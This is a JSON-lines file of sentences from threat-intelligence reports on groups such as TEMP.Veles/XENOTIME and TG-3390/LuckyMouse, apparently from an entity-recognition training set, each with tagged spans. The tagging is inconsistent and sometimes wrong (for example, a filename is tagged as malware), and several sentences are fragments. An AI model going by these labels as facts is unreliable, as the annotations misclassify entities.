{"text": "Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange .", "spans": {"ORGANIZATION: e-commerce companies": [[41, 61]], "ORGANIZATION: shipping company": [[79, 95]], "ORGANIZATION: financial organizations": [[122, 145]], "ORGANIZATION: IT firm": [[155, 162]]}, "info": {"id": "dnrti_train_001304", "source": "dnrti_train"}}
{"text": "Taidoor actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {}, "info": {"id": "dnrti_train_001306", "source": "dnrti_train"}}
{"text": "The attackers actively sent out malicious documents and maintained several IP addresses for command and control .", "spans": {}, "info": {"id": "dnrti_train_001307", "source": "dnrti_train"}}
{"text": "As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background .", "spans": {}, "info": {"id": "dnrti_train_001308", "source": "dnrti_train"}}
{"text": "Sometimes , however , certain samples made use of domain names for HTTP communication .", "spans": {}, "info": {"id": "dnrti_train_001309", "source": "dnrti_train"}}
{"text": "Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible .", "spans": {"TOOL: Taidoor malware": [[41, 56]]}, "info": {"id": "dnrti_train_001310", "source": "dnrti_train"}}
{"text": "The ultimate objective of targeted attacks is to acquire sensitive data .", "spans": {}, "info": {"id": "dnrti_train_001311", "source": "dnrti_train"}}
{"text": "In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown .", "spans": {"ORGANIZATION: FireEye": [[19, 26]], "TOOL: TRITON": [[117, 123]]}, "info": {"id": "dnrti_train_001312", "source": "dnrti_train"}}
{"text": "In our most recent analysis , we attributed the intrusion activity that led to the deployment of TRITON to a Russian government-owned technical research institute in Moscow .", "spans": {"TOOL: TRITON": [[97, 103]]}, "info": {"id": "dnrti_train_001313", "source": "dnrti_train"}}
{"text": "For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence .", "spans": {"TOOL: TRITON": [[30, 36]], "ORGANIZATION: FireEye Cyber Threat Intelligence": [[87, 120]]}, "info": {"id": "dnrti_train_001314", "source": "dnrti_train"}}
{"text": "During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware .", "spans": {"TOOL: ICS malware": [[151, 162]]}, "info": {"id": "dnrti_train_001315", "source": "dnrti_train"}}
{"text": "Additionally , the actor possibly gained a foothold on other target networks—beyond the two intrusions discussed in this post – using similar strategies .", "spans": {}, "info": {"id": "dnrti_train_001317", "source": "dnrti_train"}}
{"text": "There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild .", "spans": {"ORGANIZATION: security community": [[41, 59]], "TOOL: ICS malware": [[63, 74]]}, "info": {"id": "dnrti_train_001318", "source": "dnrti_train"}}
{"text": "ЦНИИХМ ) , a Russian government-owned technical research institution located in Moscow .", "spans": {"ORGANIZATION: research institution": [[48, 68]]}, "info": {"id": "dnrti_train_001319", "source": "dnrti_train"}}
{"text": "TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant .", "spans": {"THREAT_ACTOR: TEMP.Veles'": [[0, 11]], "TOOL: PowerShell-based tool": [[66, 87]], "TOOL: WMImplant": [[90, 99]]}, "info": {"id": "dnrti_train_001322", "source": "dnrti_train"}}
{"text": "We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[58, 68]]}, "info": {"id": "dnrti_train_001325", "source": "dnrti_train"}}
{"text": "CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": {"THREAT_ACTOR: CNIIHM": [[0, 6]], "THREAT_ACTOR: TEMP.Veles": [[102, 112]]}, "info": {"id": "dnrti_train_001328", "source": "dnrti_train"}}
{"text": "XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]], "ORGANIZATION: Dragos": [[50, 56]], "ORGANIZATION: FireEye": [[61, 68]], "TOOL: TRISIS": [[98, 104]]}, "info": {"id": "dnrti_train_001330", "source": "dnrti_train"}}
{"text": "XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8]], "TOOL: credential capture and replay": [[14, 43]], "TOOL: PSExec": [[126, 132]]}, "info": {"id": "dnrti_train_001332", "source": "dnrti_train"}}
{"text": "Dragos' data indicates XENOTIME remains active .", "spans": {"ORGANIZATION: Dragos'": [[0, 7]], "THREAT_ACTOR: XENOTIME": [[23, 31]]}, "info": {"id": "dnrti_train_001334", "source": "dnrti_train"}}
{"text": "TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[0, 10]], "TOOL: custom malware": [[21, 35]], "TOOL: tailormade credential gathering tools": [[50, 87]]}, "info": {"id": "dnrti_train_001335", "source": "dnrti_train"}}
{"text": "Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": {"ORGANIZATION: Dragos'": [[14, 21]], "TOOL: TRISIS": [[38, 44]]}, "info": {"id": "dnrti_train_001336", "source": "dnrti_train"}}
{"text": "This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[24, 31]], "TOOL: TRITON": [[62, 68]], "ORGANIZATION: research institution": [[112, 132]], "THREAT_ACTOR: TEMP.Veles": [[158, 168]]}, "info": {"id": "dnrti_train_001342", "source": "dnrti_train"}}
{"text": "This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": {"ORGANIZATION: FireEye": [[24, 31]], "TOOL: TRITON": [[64, 70]], "ORGANIZATION: research institution": [[122, 142]], "THREAT_ACTOR: TEMP.Veles": [[168, 178]]}, "info": {"id": "dnrti_train_001343", "source": "dnrti_train"}}
{"text": "FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: TRITON": [[104, 110]], "TOOL: TRITON/TRISIS malware": [[148, 169]]}, "info": {"id": "dnrti_train_001345", "source": "dnrti_train"}}
{"text": "Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media .", "spans": {"TOOL: TRITON/TRISIS": [[61, 74]], "ORGANIZATION: Dragos": [[145, 151]], "ORGANIZATION: FireEye": [[236, 243]]}, "info": {"id": "dnrti_train_001346", "source": "dnrti_train"}}
{"text": "Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: FireEye": [[55, 62]], "THREAT_ACTOR: TEMP.Veles": [[130, 140]], "TOOL: TRITON": [[188, 194]], "ORGANIZATION: Dragos": [[211, 217]], "THREAT_ACTOR: XENOTIME": [[294, 302]]}, "info": {"id": "dnrti_train_001347", "source": "dnrti_train"}}
{"text": "Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[83, 91]]}, "info": {"id": "dnrti_train_001348", "source": "dnrti_train"}}
{"text": "Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology .", "spans": {"ORGANIZATION: FireEye": [[241, 248]], "ORGANIZATION: Dragos'": [[253, 260]], "TOOL: TRITON": [[294, 300]]}, "info": {"id": "dnrti_train_001349", "source": "dnrti_train"}}
{"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[38, 48], [127, 137]], "ORGANIZATION: FireEye": [[51, 58]], "TOOL: TRITON": [[160, 166]]}, "info": {"id": "dnrti_train_001350", "source": "dnrti_train"}}
{"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) – yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": {"ORGANIZATION: FireEye": [[20, 27], [161, 168]], "THREAT_ACTOR: TEMP.Veles": [[129, 139]]}, "info": {"id": "dnrti_train_001351", "source": "dnrti_train"}}
{"text": "Of note , this methodology of naming abstracts away the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"THREAT_ACTOR: XENOTIME": [[74, 82]], "ORGANIZATION: research institution": [[142, 162]]}, "info": {"id": "dnrti_train_001353", "source": "dnrti_train"}}
{"text": "Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different .", "spans": {"THREAT_ACTOR: XENOTIME": [[113, 121]], "THREAT_ACTOR: TEMP.Veles": [[126, 136]], "TOOL: TRITON": [[174, 180]]}, "info": {"id": "dnrti_train_001354", "source": "dnrti_train"}}
{"text": "CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Threat Group-1314": [[68, 85]]}, "info": {"id": "dnrti_train_001356", "source": "dnrti_train"}}
{"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": {"THREAT_ACTOR: TG-3390": [[26, 33]], "TOOL: SWCs": [[71, 75]]}, "info": {"id": "dnrti_train_001364", "source": "dnrti_train"}}
{"text": "After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims .", "spans": {"THREAT_ACTOR: TG-3390": [[31, 38]], "TOOL: HTTPBrowser backdoor": [[52, 72]]}, "info": {"id": "dnrti_train_001366", "source": "dnrti_train"}}
{"text": "Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": {"ORGANIZATION: CTU": [[11, 14]], "THREAT_ACTOR: Threat Group-1314": [[68, 85]]}, "info": {"id": "dnrti_train_001371", "source": "dnrti_train"}}
{"text": "CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Group-3390": [[41, 51]]}, "info": {"id": "dnrti_train_001372", "source": "dnrti_train"}}
{"text": "Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions .", "spans": {"ORGANIZATION: CTU": [[41, 44]], "THREAT_ACTOR: TG-3390": [[82, 89]]}, "info": {"id": "dnrti_train_001380", "source": "dnrti_train"}}
{"text": "TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "dnrti_train_001384", "source": "dnrti_train"}}
{"text": "Using a U.S.-based C2 infrastructure ( see Figure 7 ) to compromise targets in the U.S. helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": {"TOOL: U.S.-based C2 infrastructure": [[8, 36]], "THREAT_ACTOR: TG-3390": [[94, 101]]}, "info": {"id": "dnrti_train_001385", "source": "dnrti_train"}}
{"text": "One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file .", "spans": {"ORGANIZATION: CTU": [[31, 34]], "TOOL: PDF file": [[70, 78]], "TOOL: HTTPBrowser installer": [[145, 166]]}, "info": {"id": "dnrti_train_001388", "source": "dnrti_train"}}
{"text": "TG-3390 sends spearphishing emails with ZIP archive attachments .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]]}, "info": {"id": "dnrti_train_001390", "source": "dnrti_train"}}
{"text": "CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[30, 37]]}, "info": {"id": "dnrti_train_001391", "source": "dnrti_train"}}
{"text": "In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"THREAT_ACTOR: TG-3390": [[16, 23]], "VULNERABILITY: CVE-2011-3544": [[38, 51]], "TOOL: HTTPBrowser backdoor": [[119, 139]], "VULNERABILITY: CVE-2010-0738": [[146, 159]], "TOOL: JBoss": [[181, 186]]}, "info": {"id": "dnrti_train_001393", "source": "dnrti_train"}}
{"text": "In particular , the threat actors have exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"VULNERABILITY: CVE-2011-3544": [[49, 62]], "TOOL: HTTPBrowser backdoor": [[130, 150]], "VULNERABILITY: CVE-2010-0738": [[157, 170]], "TOOL: JBoss": [[192, 197]]}, "info": {"id": "dnrti_train_001395", "source": "dnrti_train"}}
{"text": "CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Threat Group-3390": [[34, 51]], "ORGANIZATION: Kaspersky": [[73, 82]]}, "info": {"id": "dnrti_train_001397", "source": "dnrti_train"}}
{"text": "The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system .", "spans": {"TOOL: PlugX": [[50, 55]], "TOOL: HTTPBrowser": [[60, 71]]}, "info": {"id": "dnrti_train_001398", "source": "dnrti_train"}}
{"text": "CTU researchers have observed the TG-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[34, 41]], "ORGANIZATION: Kaspersky": [[63, 72]]}, "info": {"id": "dnrti_train_001399", "source": "dnrti_train"}}
{"text": "If the OwaAuth web shell is ineffective because the victim uses two-factor authentication for webmail , TG-3390 identify other externally accessible servers and deploy ChinaChopper web shells .", "spans": {"TOOL: OwaAuth web shell": [[7, 24]], "THREAT_ACTOR: TG-3390": [[104, 111]]}, "info": {"id": "dnrti_train_001405", "source": "dnrti_train"}}
{"text": "After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name .", "spans": {"TOOL: Baidu search engine": [[89, 108]]}, "info": {"id": "dnrti_train_001406", "source": "dnrti_train"}}
{"text": "CTU researchers discovered the threat actors searching for \" [company] login \" , which directed them to the landing page for remote access .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "dnrti_train_001407", "source": "dnrti_train"}}
{"text": "TG-3390 actors keep track of and leverage existing ASPXTool web shells in their operations , preferring to issue commands via an internally accessible web shell rather than HTTPBrowser or PlugX .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: ASPXTool web shells": [[51, 70]], "TOOL: HTTPBrowser": [[173, 184]], "TOOL: PlugX": [[188, 193]]}, "info": {"id": "dnrti_train_001408", "source": "dnrti_train"}}
{"text": "Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication .", "spans": {}, "info": {"id": "dnrti_train_001410", "source": "dnrti_train"}}
{"text": "In 2015 , the SecureWorks® Counter Threat Unit™ ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU™ analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[14, 47]], "ORGANIZATION: CTU": [[50, 53]], "THREAT_ACTOR: TG-3390": [[130, 137]], "ORGANIZATION: CTU™": [[148, 152]]}, "info": {"id": "dnrti_train_001411", "source": "dnrti_train"}}
{"text": "In 2015 , the SecureWorks documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks": [[14, 25]], "THREAT_ACTOR: TG-3390": [[86, 93]], "ORGANIZATION: CTU": [[104, 107]]}, "info": {"id": "dnrti_train_001413", "source": "dnrti_train"}}
{"text": "BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {}, "info": {"id": "dnrti_train_001414", "source": "dnrti_train"}}
{"text": "Based on BRONZE UNION 's targeting activity , CTU researchers assess it is highly likely that the group focuses on political and defense organization networks .", "spans": {"ORGANIZATION: CTU": [[46, 49]], "ORGANIZATION: political": [[115, 124]], "ORGANIZATION: defense organization": [[129, 149]]}, "info": {"id": "dnrti_train_001415", "source": "dnrti_train"}}
{"text": "this SWC was used to specifically target Turkish .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001416", "source": "dnrti_train"}}
{"text": "this SWC was used to specifically target Turkish goverment .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001419", "source": "dnrti_train"}}
{"text": "Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {"ORGANIZATION: CTU": [[22, 25]]}, "info": {"id": "dnrti_train_001420", "source": "dnrti_train"}}
{"text": "this SWC was used to specifically target Turkish banking .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001421", "source": "dnrti_train"}}
{"text": "this SWC was used to specifically target Turkish academic networks .", "spans": {"TOOL: SWC": [[5, 8]]}, "info": {"id": "dnrti_train_001422", "source": "dnrti_train"}}
{"text": "BRONZE UNION has consistently demonstrated the capability to conduct successful large-scale intrusions against high-profile networks and systems .", "spans": {}, "info": {"id": "dnrti_train_001423", "source": "dnrti_train"}}
{"text": "The threat actors appear to be able to create and leverage multiple SWCs in parallel .", "spans": {"TOOL: SWCs": [[68, 72]]}, "info": {"id": "dnrti_train_001424", "source": "dnrti_train"}}
{"text": "In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool .", "spans": {"ORGANIZATION: CTU": [[25, 28]], "MALWARE: s.txt": [[65, 70]]}, "info": {"id": "dnrti_train_001425", "source": "dnrti_train"}}
{"text": "BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance .", "spans": {}, "info": {"id": "dnrti_train_001426", "source": "dnrti_train"}}
{"text": "BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure .", "spans": {}, "info": {"id": "dnrti_train_001427", "source": "dnrti_train"}}
{"text": "This script relays commands and output between the controller and the system .", "spans": {}, "info": {"id": "dnrti_train_001428", "source": "dnrti_train"}}
{"text": "The threat actors used the appcmd command-line tool to unlock and disable the default logging component on the server ( systsm.webServer/httplogging ) and then delete existing logs from the system ( see Figure 4 ) .", "spans": {}, "info": {"id": "dnrti_train_001429", "source": "dnrti_train"}}
{"text": "In 2016 , CTU researchers observed the group using native system .", "spans": {"ORGANIZATION: CTU": [[10, 13]]}, "info": {"id": "dnrti_train_001430", "source": "dnrti_train"}}
{"text": "In March 2018 we detected an ongoing campaign .", "spans": {}, "info": {"id": "dnrti_train_001431", "source": "dnrti_train"}}
{"text": "TG-3390 's activities indicate a preference for leveraging SWCs and scan-and-exploit techniques to compromise target systems .", "spans": {}, "info": {"id": "dnrti_train_001432", "source": "dnrti_train"}}
{"text": "As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace .", "spans": {}, "info": {"id": "dnrti_train_001433", "source": "dnrti_train"}}
{"text": "we detected an ongoing campaign targeting a national data center .", "spans": {}, "info": {"id": "dnrti_train_001434", "source": "dnrti_train"}}
{"text": "The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool ( RAT ) .", "spans": {"TOOL: HyperBro Trojan": [[23, 38]], "TOOL: RAT": [[98, 101]]}, "info": {"id": "dnrti_train_001435", "source": "dnrti_train"}}
{"text": "we detected an ongoing campaign targeting a national data center in the Centeral Asia .", "spans": {}, "info": {"id": "dnrti_train_001436", "source": "dnrti_train"}}
{"text": "The tools found in this campaign , such as the HyperBro Trojan , are regularly used by a variety of Chinese-speaking actors .", "spans": {"TOOL: HyperBro Trojan": [[47, 62]]}, "info": {"id": "dnrti_train_001437", "source": "dnrti_train"}}
{"text": "Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) .", "spans": {"THREAT_ACTOR: LuckyMouse": [[61, 71]], "THREAT_ACTOR: EmissaryPanda": [[111, 124]], "THREAT_ACTOR: APT27": [[129, 134]]}, "info": {"id": "dnrti_train_001438", "source": "dnrti_train"}}
{"text": "It's possible TG-3390 used a waterhole to infect data center employees .", "spans": {"THREAT_ACTOR: TG-3390": [[14, 21]], "ORGANIZATION: data center employees": [[49, 70]]}, "info": {"id": "dnrti_train_001439", "source": "dnrti_train"}}
{"text": "Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 ( Microsoft Office Equation Editor , widely used by Chinese-speaking actors since December 2017 ) , we can′t prove they were related to this particular attack .", "spans": {"VULNERABILITY: CVE-2017-11882": [[65, 79]], "TOOL: Microsoft Office Equation Editor": [[82, 114]]}, "info": {"id": "dnrti_train_001440", "source": "dnrti_train"}}
{"text": "We suspect this router was hacked as part of the campaign in order to process the malware 's HTTP requests .", "spans": {"TOOL: router": [[16, 22]]}, "info": {"id": "dnrti_train_001441", "source": "dnrti_train"}}
{"text": "In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": {"ORGANIZATION: Wikileaks": [[16, 25]], "TOOL: Mikrotik": [[71, 79]], "TOOL: ChimayRed": [[87, 96]]}, "info": {"id": "dnrti_train_001442", "source": "dnrti_train"}}
{"text": "There were traces of HyperBro in the infected data center from mid-November 2017 .", "spans": {"TOOL: HyperBro": [[21, 29]]}, "info": {"id": "dnrti_train_001443", "source": "dnrti_train"}}
{"text": "This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology .", "spans": {}, "info": {"id": "dnrti_train_001445", "source": "dnrti_train"}}
{"text": "Usually , the delivered payload is either the well-known ' PlugX ' or ' HTTPBrowser ' RAT , a tool which is believed to have Chinese origins and to be used only by certain Chinese hacking groups .", "spans": {"TOOL: PlugX": [[59, 64]], "TOOL: HTTPBrowser": [[72, 83]], "TOOL: RAT": [[86, 89]]}, "info": {"id": "dnrti_train_001446", "source": "dnrti_train"}}
{"text": "Emissary Panda has used many ways with the most notable being the exploits from the Hacking Team leak .", "spans": {}, "info": {"id": "dnrti_train_001447", "source": "dnrti_train"}}
{"text": "Emissary Panda is still active and continues to target selected organisations .", "spans": {}, "info": {"id": "dnrti_train_001448", "source": "dnrti_train"}}
{"text": "Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed central Asian country in order to conduct watering hole attacks .", "spans": {"ORGANIZATION: Cybersecurity": [[0, 13]]}, "info": {"id": "dnrti_train_001449", "source": "dnrti_train"}}
{"text": "The campaign is believed to be active covertly since fall 2017 .", "spans": {}, "info": {"id": "dnrti_train_001450", "source": "dnrti_train"}}
{"text": "LuckyMouse , also known as Iron Tiger , EmissaryPanda , APT 27 and Threat Group-3390 , is the same group of Chinese hackers who was found targeting Asian countries with Bitcoin mining malware early this year .", "spans": {"THREAT_ACTOR: LuckyMouse": [[0, 10]], "THREAT_ACTOR: Iron Tiger": [[27, 37]], "THREAT_ACTOR: EmissaryPanda": [[40, 53]], "THREAT_ACTOR: APT 27": [[56, 62]], "THREAT_ACTOR: Threat Group-3390": [[67, 84]], "TOOL: Bitcoin mining malware": [[169, 191]]}, "info": {"id": "dnrti_train_001451", "source": "dnrti_train"}}
{"text": "March by security researchers from Kaspersky Labs .", "spans": {"ORGANIZATION: Kaspersky Labs": [[35, 49]]}, "info": {"id": "dnrti_train_001452", "source": "dnrti_train"}}
{"text": "For example , at the end of 2016 CTU researchers observed the threat actors using native system functionality to disable logging processes and delete logs within a network .", "spans": {"ORGANIZATION: CTU": [[33, 36]]}, "info": {"id": "dnrti_train_001453", "source": "dnrti_train"}}
{"text": "The group has been active since at least 2010 and was behind many previous attack campaigns resulting in the theft of massive amounts of data from the directors and managers of US-based defense contractors .", "spans": {"ORGANIZATION: defense contractors": [[186, 205]]}, "info": {"id": "dnrti_train_001454", "source": "dnrti_train"}}
{"text": "attacks to a Chinese-speaking threat actor group called LuckyMouse .", "spans": {}, "info": {"id": "dnrti_train_001455", "source": "dnrti_train"}}
{"text": "LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) .", "spans": {"VULNERABILITY: Microsoft Office vulnerability": [[48, 78]], "VULNERABILITY: CVE-2017-11882": [[81, 95]]}, "info": {"id": "dnrti_train_001456", "source": "dnrti_train"}}
{"text": "This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" .", "spans": {}, "info": {"id": "dnrti_train_001457", "source": "dnrti_train"}}
{"text": "The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"THREAT_ACTOR: LuckyMouse": [[106, 116]], "ORGANIZATION: employees": [[210, 219]]}, "info": {"id": "dnrti_train_001458", "source": "dnrti_train"}}
{"text": "According to the researchers , the group injected malicious JavaScript code into the official government websites associated with the data center in order to conduct watering hole attacks .", "spans": {"TOOL: JavaScript code": [[60, 75]]}, "info": {"id": "dnrti_train_001459", "source": "dnrti_train"}}
{"text": "the targeted system with a piece of malware called HyperBro , a Remote Access Trojan ( RAT ) .", "spans": {"TOOL: HyperBro": [[51, 59]], "TOOL: Remote Access Trojan": [[64, 84]], "TOOL: RAT": [[87, 90]]}, "info": {"id": "dnrti_train_001460", "source": "dnrti_train"}}
{"text": "The main command and control ( C&C ) server used in this attack is hosted on an IP address which belongs to a Ukrainian ISP , specifically to a MikroTik router running a firmware version released in March 2016 .", "spans": {"TOOL: MikroTik": [[144, 152]]}, "info": {"id": "dnrti_train_001461", "source": "dnrti_train"}}
{"text": "the targets of the hacking group were in the automotive .", "spans": {}, "info": {"id": "dnrti_train_001462", "source": "dnrti_train"}}
{"text": "Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"ORGANIZATION: Dell SecureWorks": [[0, 16]], "THREAT_ACTOR: Group-3390": [[57, 67]]}, "info": {"id": "dnrti_train_001463", "source": "dnrti_train"}}
{"text": "The group , believed to be based in China , has also targeted defense contractors , colleges and universities , law firms , and political organizations — including organizations related to Chinese minority ethnic groups .", "spans": {"ORGANIZATION: defense contractors": [[62, 81]], "ORGANIZATION: law firms": [[112, 121]], "ORGANIZATION: political organizations": [[128, 151]], "ORGANIZATION: minority ethnic groups": [[197, 219]]}, "info": {"id": "dnrti_train_001464", "source": "dnrti_train"}}
{"text": "LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data .", "spans": {"ORGANIZATION: Dell SecureWorks": [[67, 83]]}, "info": {"id": "dnrti_train_001465", "source": "dnrti_train"}}
{"text": "Designated as Threat Group 3390 and nicknamed \" Emissary Panda \" by researchers , the hacking group has compromised victims' networks largely through \" watering hole \" attacks launched from over 100 compromised legitimate websites , sites picked because they were known to be frequented by those targeted in the attack .", "spans": {"THREAT_ACTOR: Threat Group 3390": [[14, 31]], "THREAT_ACTOR: Emissary Panda": [[48, 62]]}, "info": {"id": "dnrti_train_001466", "source": "dnrti_train"}}
{"text": "the United Kingdom had data stolen by members of Emissary Panda .", "spans": {"THREAT_ACTOR: Emissary Panda": [[49, 63]]}, "info": {"id": "dnrti_train_001467", "source": "dnrti_train"}}
{"text": "the US had data stolen by members of Emissary Panda .", "spans": {"THREAT_ACTOR: Emissary Panda": [[37, 51]]}, "info": {"id": "dnrti_train_001468", "source": "dnrti_train"}}
{"text": "No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported .", "spans": {"VULNERABILITY: zero-day vulnerabilities": [[3, 27]], "VULNERABILITY: CVE-2011-3544": [[124, 137]], "VULNERABILITY: CVE-2010-0738": [[185, 198]], "ORGANIZATION: Dell SecureWorks'": [[231, 248]]}, "info": {"id": "dnrti_train_001469", "source": "dnrti_train"}}
